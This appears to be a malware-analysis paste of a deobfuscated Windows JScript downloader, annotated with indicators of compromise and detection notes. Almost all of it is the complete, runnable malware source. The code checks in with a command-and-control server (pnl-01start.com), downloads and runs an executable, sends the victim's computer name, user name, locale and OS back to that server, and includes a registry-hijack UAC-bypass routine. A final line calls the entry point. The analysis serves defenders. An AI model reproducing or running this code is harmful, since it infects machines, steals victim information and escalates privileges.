dissectmalware

Malicious JScript Downloader

May 5th, 2018
// This is a malicious script; do not run it on a production machine.
// Original sample: https://www.hybrid-analysis.com/sample/5ff0529719df26f5589074f5efab1aab0fdf8e514054d14c2ab04ecbb9683156?environmentId=100
//
// Summary of the listing: a WSH/JScript downloader. The obfuscated function
// names (_0xDF9B, _0xDFED, ...) are mapped to readable aliases at the end of
// the listing; the entry point is the final call to _0xE55F ("Arrochar").

// ########################### deobfuscated code ####################################
// runAsAdmin (alias at the bottom of the listing).
// Rewrites the per-user handler for .msc files so that it points at
// %temp%\Project1.exe, launches eventvwr.exe, waits 60 s, then deletes the
// handler again. This matches the shape of the eventvwr.exe/mscfile
// auto-elevation trick, though the script itself only shows the key write
// followed by the launch — presumably the payload is expected to run elevated.
// Detection artifacts: a write to HKCU\Software\Classes\mscfile\shell\open\command
// and the path %temp%\Project1.exe. Nothing in this listing drops Project1.exe,
// and nothing in this listing calls this function (it is only aliased).
// The parameter shadows the function's own name and is never used.
// Always returns false; every error is swallowed.
function _0xDF9B(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("WScript.Shell");
        // Hijack the mscfile "open" verb (default value) to point at the payload.
        // Shell.Run is not asked to wait here, so the REG calls are fire-and-forget.
        _0xDFED.Run("REG ADD HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /t REG_SZ /d %temp%/Project1.exe /f");
        WScript.Sleep(1000);
        // Launch Event Viewer, which consults the hijacked mscfile handler.
        _0xDFED.Run("%SystemRoot%\\System32\\eventvwr.exe");
        // 60 s pause — presumably to give the launched payload time before the
        // registry evidence is removed below.
        WScript.Sleep(60000);
        // Clean up: remove the hijacked default value again.
        _0xDFED.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f")
    } catch (e) {};
    return false
}
  17.  
// dlToFile (alias at the bottom of the listing).
// HTTP GET of a URL and save of the raw response body to disk.
//   _0xE0E3 - base URL; "&=<random>" is appended as a cache-buster
//   _0xDFED - value sent in a custom "x-auth" request header (shadows the
//             function's own name inside this body)
//   _0xDF9B - destination file path
// Returns true only when the server answers 200 and the file was written;
// false on any other status or on any exception (all errors are swallowed).
// Detection artifacts: synchronous MSXML2.XMLHTTP request carrying an
// "x-auth" header, followed by an ADODB.Stream SaveToFile.
function _0xDFED(_0xE0E3, _0xDFED, _0xDF9B) {
    try {
        var _0xE03F = WScript.CreateObject("MSXML2.XMLHTTP");
        // Third argument false = synchronous request.
        _0xE03F.Open("GET", _0xE0E3 + "&=" + Math.floor((Math.random() * 999999999) + 1), false);
        _0xE03F.SetRequestHeader("x-auth", _0xDFED);
        _0xE03F.Send();
        if (_0xE03F.Status == 200) {
            var _0xE091 = WScript.CreateObject("ADODB.Stream");
            // Type 1 / save mode 2 — presumably adTypeBinary and
            // adSaveCreateOverWrite (ADODB constants, not defined in this listing).
            _0xE091.Type = 1;
            _0xE091.Open();
            _0xE091.Write(_0xE03F.ResponseBody);
            _0xE091.SaveToFile(_0xDF9B, 2);
            _0xE091.Close();
            return true
        }
    } catch (e) {};
    return false
}
  36.  
// getPathFromGuid (alias at the bottom of the listing).
// Reads the default value of HKCR\CLSID\<guid>\InprocServer32, i.e. the DLL
// path registered for a COM class. Returns "" on any error.
// NOTE(review): the "\\\\" literals produce doubled backslashes in the
// registry path at runtime — possibly an escaping artifact of the
// deobfuscation; confirm against the original sample.
// Not called anywhere in this listing.
function _0xE03F(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("WScript.Shell");
        return _0xDFED.RegRead("HKEY_CLASSES_ROOT\\\\CLSID\\\\" + _0xDF9B + "\\\\InprocServer32\\\\")
    } catch (e) {};
    return ""
}
  44.  
// getPathFromGuidWow (alias at the bottom of the listing).
// Same lookup as _0xE03F but under the 32-bit registry view
// (HKCR\Wow6432Node\CLSID\<guid>\InprocServer32). Returns "" on any error.
// NOTE(review): same doubled-backslash question as in _0xE03F — confirm
// against the original sample.
// Not called anywhere in this listing.
function _0xE091(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("WScript.Shell");
        return _0xDFED.RegRead("HKEY_CLASSES_ROOT\\\\Wow6432Node\\\\CLSID\\\\" + _0xDF9B + "\\\\InprocServer32\\\\")
    } catch (e) {};
    return ""
}
  52.  
// fileExists (alias at the bottom of the listing).
// Returns FileSystemObject.FileExists(path); false on any error.
// Not called anywhere in this listing (the marker check in _0xE4BB uses
// FileSystemObject directly).
function _0xE0E3(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("Scripting.FileSystemObject");
        return _0xDFED.FileExists(_0xDF9B)
    } catch (e) {};
    return false
}
  60.  
// folderExists (alias at the bottom of the listing).
// Returns FileSystemObject.FolderExists(path); false on any error.
// Not called anywhere in this listing.
function _0xE135(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("Scripting.FileSystemObject");
        return _0xDFED.FolderExists(_0xDF9B)
    } catch (e) {};
    return false
}
  68.  
// getEnv (alias at the bottom of the listing).
// Expands "%<name>%" via WScript.Shell.ExpandEnvironmentStrings and returns
// the result; "" on any error. Used below for APPDATA, COMPUTERNAME and
// USERNAME. NOTE: if the variable is not set, ExpandEnvironmentStrings is
// expected to hand back the literal "%name%" rather than "" — callers here
// do not check for that.
function _0xE187(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("WScript.Shell");
        return _0xDFED.ExpandEnvironmentStrings("%" + _0xDF9B + "%")
    } catch (e) {};
    return ""
}
  76.  
// randomStr (alias at the bottom of the listing).
// Builds a string of _0xDFED characters drawn uniformly (Math.random) from
// [A-Za-z0-9]. Used in _0xE55F with length 6 to name the drop folder and the
// dropped .exe — a 6-character alphanumeric folder under %APPDATA% containing
// a 6-character alphanumeric .exe is a usable hunting pattern.
function _0xE1D9(_0xDFED) {
    var _0xE091 = "";
    var _0xE03F = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var _0xDF9B = 0; _0xDF9B < _0xDFED; _0xDF9B++) {
        _0xE091 += _0xE03F.charAt(Math.floor(Math.random() * _0xE03F.length))
    };
    return _0xE091
}
  85.  
// runAsUser (alias at the bottom of the listing).
// Executes the given command line through WScript.Shell.Run in the current
// user's context. Run is not asked to wait, and any error is swallowed.
// In _0xE55F this is what launches the downloaded .exe.
function _0xE22B(_0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("WScript.Shell");
        _0xDFED.Run(_0xDF9B)
    } catch (e) {}
}
  92.  
// dlToText (alias at the bottom of the listing).
// Same request as _0xDFED (GET with "&=<random>" cache-buster and an "x-auth"
// header) but returns the response text instead of saving it.
//   _0xE03F - base URL
//   _0xDF9B - "x-auth" header value
// Returns responseText on HTTP 200, otherwise false (also false on any
// exception, which is swallowed). Used in _0xE55F to fetch the "?q" go/no-go
// flag and the "?w" file name from the C2.
function _0xE27D(_0xE03F, _0xDF9B) {
    try {
        var _0xDFED = WScript.CreateObject("MSXML2.XMLHTTP");
        // Synchronous request (third argument false).
        _0xDFED.Open("GET", _0xE03F + "&=" + Math.floor((Math.random() * 999999999) + 1), false);
        _0xDFED.SetRequestHeader("x-auth", _0xDF9B);
        _0xDFED.Send();
        if (_0xDFED.Status == 200) {
            return _0xDFED.responseText
        }
    } catch (e) {};
    return false
}
  105.  
// base64ToBinary (alias at the bottom of the listing).
// Decodes a base64 string to bytes by abusing an MSXML DOM element with
// dataType "bin.base64" (nodeTypedValue yields the decoded bytes), then
// writes those bytes to the given path through a binary ADODB.Stream.
//   _0xDF9B - base64 text
//   _0xE0E3 - destination file path
// Unlike the other helpers there is no try/catch here, so a failure would
// propagate to the caller. Not called anywhere in this listing.
function _0xE2CF(_0xDF9B, _0xE0E3) {
    var _0xE03F = new ActiveXObject("Microsoft.XMLDOM");
    var _0xE091 = _0xE03F.createElement("tmp");
    _0xE091.dataType = "bin.base64";
    _0xE091.text = _0xDF9B;
    var _0xDFED = _0xE091.nodeTypedValue;
    var _0xE135 = new ActiveXObject("ADODB.Stream");
    _0xE135.Open();
    // Type 1 / save mode 2 — presumably adTypeBinary / adSaveCreateOverWrite.
    _0xE135.Type = 1;
    _0xE135.Write(_0xDFED);
    _0xE135.SaveToFile(_0xE0E3, 2)
}
  118.  
// getCountryName (alias at the bottom of the listing).
// Reads the user's locale country name from
// HKCU\Control Panel\International\sCountry. No try/catch: a RegRead
// failure would throw into the caller (_0xE469, whose own caller swallows it).
function _0xE321() {
    var _0xDFED = WScript.CreateObject("WScript.Shell");
    var _0xDF9B = _0xDFED.RegRead("HKCU\\Control Panel\\International\\sCountry");
    return _0xDF9B
}
  124.  
// getLanguage (alias at the bottom of the listing).
// Reads the user's locale language from
// HKCU\Control Panel\International\sLanguage. No try/catch, like _0xE321.
function _0xE373() {
    var _0xDFED = WScript.CreateObject("WScript.Shell");
    var _0xDF9B = _0xDFED.RegRead("HKCU\\Control Panel\\International\\sLanguage");
    return _0xDF9B
}
  130.  
// dataPost (alias at the bottom of the listing).
// Synchronous HTTP POST of a form-encoded body with the "x-auth" header.
//   _0xE091 - URL (no cache-buster is appended here, unlike the GET helpers)
//   _0xDF9B - "x-auth" header value
//   _0xE03F - request body (already url-encoded by the caller)
// Returns responseText on HTTP 200, otherwise false; exceptions are swallowed.
// Used by _0xE469 to send the victim profile to the C2.
function _0xE3C5(_0xE091, _0xDF9B, _0xE03F) {
    try {
        var _0xDFED = WScript.CreateObject("MSXML2.XMLHTTP");
        _0xDFED.Open("POST", _0xE091, false);
        _0xDFED.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        _0xDFED.SetRequestHeader("x-auth", _0xDF9B);
        _0xDFED.Send(_0xE03F);
        if (_0xDFED.Status == 200) {
            return _0xDFED.responseText
        }
    } catch (e) {};
    return false
}
  144.  
// getSO (alias at the bottom of the listing; "SO" presumably "sistema
// operacional"). Returns the OS name via WMI: the Caption of the first
// Win32_OperatingSystem instance in root\CIMV2. No try/catch.
// Detection: WMI query "SELECT * FROM Win32_OperatingSystem" from wscript.exe.
function _0xE417() {
    // 0x10 | 0x20 — WMI ExecQuery flags (presumably ReturnImmediately |
    // ForwardOnly; the constants are not defined in this listing).
    var _0xE135 = 0x10;
    var _0xE0E3 = 0x20;
    var _0xE091 = GetObject("winmgmts:\\\\.\\root\\CIMV2");
    var _0xDF9B = _0xE091.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL", _0xE135 | _0xE0E3);
    var _0xDFED = new Enumerator(_0xDF9B);
    var _0xE03F = _0xDFED.item();
    return _0xE03F.Caption
}
  154.  
// SendInfect (alias at the bottom of the listing).
// Builds a victim profile and POSTs it to the C2 via _0xE3C5:
//   country=<sCountry>&l=<sLanguage>&c=<COMPUTERNAME>&u=<USERNAME>&s=<OS caption>
// Values are concatenated without URL-encoding. The return value of the POST
// is discarded.
//   _0xE03F - URL (in _0xE55F this is the C2 base + "?t")
//   _0xDF9B - "x-auth" header value
// Useful for detection: the literal parameter names country/l/c/u/s in a
// form-encoded POST carrying an "x-auth" header.
function _0xE469(_0xE03F, _0xDF9B) {
    var _0xDFED = "country=" + _0xE321() + "&l=" + _0xE373() + "&c=" + _0xE187("COMPUTERNAME") + "&u=" + _0xE187("USERNAME") + "&s=" + _0xE417();
    _0xE3C5(_0xE03F, _0xDF9B, _0xDFED)
}
  159.  
// Prosseguir ("proceed"; alias at the bottom of the listing).
// Infection-marker check: returns true when %APPDATA%\<this script's file
// name> does NOT exist yet, i.e. the host has not been marked by _0xE50D.
// NOTE(review): the "\\\\" literal yields a doubled backslash in the path at
// runtime — likely an escaping artifact of the deobfuscation; Windows
// generally tolerates it, but confirm against the original sample.
function _0xE4BB() {
    var _0xDF9B = WScript.CreateObject("Scripting.FileSystemObject");
    var _0xDFED = _0xE187("APPDATA") + "\\\\" + WScript.ScriptName;
    return _0xDF9B.FileExists(_0xDFED) == false
}
  165.  
// Marcar ("mark"; alias at the bottom of the listing).
// Writes the infection marker: an empty text file at
// %APPDATA%\<this script's file name> (overwriting if present). Its presence
// makes _0xE4BB return false on later runs. The marker file is a simple
// on-disk IOC: a zero-byte file in %APPDATA% named after the script.
function _0xE50D() {
    var _0xDF9B = WScript.CreateObject("Scripting.FileSystemObject");
    var _0xDFED = _0xE187("APPDATA") + "\\\\" + WScript.ScriptName;
    _0xDF9B.CreateTextFile(_0xDFED, true)
}
  171.  
// Arrochar (alias at the bottom of the listing) — the main download routine.
//   _0xE3C5 - C2 base URL (the parameter shadows the dataPost function name;
//             dataPost itself is reached indirectly through _0xE469)
//   _0xE2CF - "x-auth" header value (shadows the base64ToBinary function name)
// Flow, all inside one try/catch that swallows every error:
//   1. GET <base>?q  — proceed only if the body is exactly "1" and the
//      infection marker (_0xE4BB) is absent.
//   2. Create %APPDATA%\<6 random alnum chars>.
//   3. GET <base>?w  — a file name chosen by the server.
//   4. GET <base>?e  — saved as <folder>\<6 random alnum chars>.exe.
//      GET <base>?r  — saved as <folder>\<name from step 3>.
//   5. If both downloads succeeded: run the .exe (_0xE22B), POST the victim
//      profile to <base>?t (_0xE469), and write the marker (_0xE50D).
// The ?q/?w/?e/?r/?t query strings plus the "&=<random>" suffix that the GET
// helpers append are the network IOCs for this sample.
function _0xE55F(_0xE3C5, _0xE2CF) {
    try {
        var _0xE373 = _0xE27D(_0xE3C5 + "?q", _0xE2CF);
        // String compare: only the literal "1" from the server lets it continue.
        if ((_0xE373 == "1") && (_0xE4BB())) {
            var _0xE135 = WScript.CreateObject("Scripting.FileSystemObject");
            var _0xE321 = _0xE187("APPDATA") + "\\\\" + _0xE1D9(6);
            _0xE135.CreateFolder(_0xE321);
            // Server-supplied name for the second download; false on failure.
            var _0xE091 = _0xE27D(_0xE3C5 + "?w", _0xE2CF);
            if (_0xE091) {
                var _0xE0E3 = _0xE321 + "\\\\" + _0xE1D9(6) + ".exe";
                var _0xE03F = _0xDFED(_0xE3C5 + "?e", _0xE2CF, _0xE0E3);
                var _0xDF9B = _0xDFED(_0xE3C5 + "?r", _0xE2CF, _0xE321 + "\\\\" + _0xE091);
                if (_0xE03F && _0xDF9B) {
                    _0xE22B(_0xE0E3);
                    _0xE469(_0xE3C5 + "?t", _0xE2CF);
                    _0xE50D()
                }
            }
        }
    } catch (e) {}
}
// Readable aliases for the obfuscated functions above. The Portuguese names
// (Prosseguir, Marcar, Arrochar, "padrao", getSO) suggest these labels come
// from the original author rather than the analyst, but that cannot be
// confirmed from this listing. Assigned as implicit globals (no var).
runAsAdmin = _0xDF9B;        // mscfile/eventvwr.exe handler hijack — defined, never called here
dlToFile = _0xDFED;          // GET -> file, with x-auth header
getPathFromGuid = _0xE03F;   // HKCR\CLSID\<guid>\InprocServer32 lookup — not called here
getPathFromGuidWow = _0xE091;// same, 32-bit view — not called here
fileExists = _0xE0E3;        // not called here
folderExists = _0xE135;      // not called here
getEnv = _0xE187;            // ExpandEnvironmentStrings("%name%")
randomStr = _0xE1D9;         // random [A-Za-z0-9] string of given length
runAsUser = _0xE22B;         // WScript.Shell.Run(cmd)
dlToText = _0xE27D;          // GET -> responseText, with x-auth header
base64ToBinary = _0xE2CF;    // not called here
getCountryName = _0xE321;    // HKCU\Control Panel\International\sCountry
getLanguage = _0xE373;       // HKCU\Control Panel\International\sLanguage
dataPost = _0xE3C5;          // POST form body, with x-auth header
getSO = _0xE417;             // OS caption via WMI
SendInfect = _0xE469;        // POST country/l/c/u/s victim profile
Prosseguir = _0xE4BB;        // true while %APPDATA%\<ScriptName> marker is absent
Marcar = _0xE50D;            // create that marker
Arrochar = _0xE55F;          // main download/execute routine
// Entry point. IOCs: C2 base https://pnl-01start.com/ (requests to ?q, ?w,
// ?e, ?r, ?t with an "&=<random>" cache-buster) and the header value
// "x-auth: padrao" on every request.
_0xE55F("https://pnl-01start.com/", "padrao")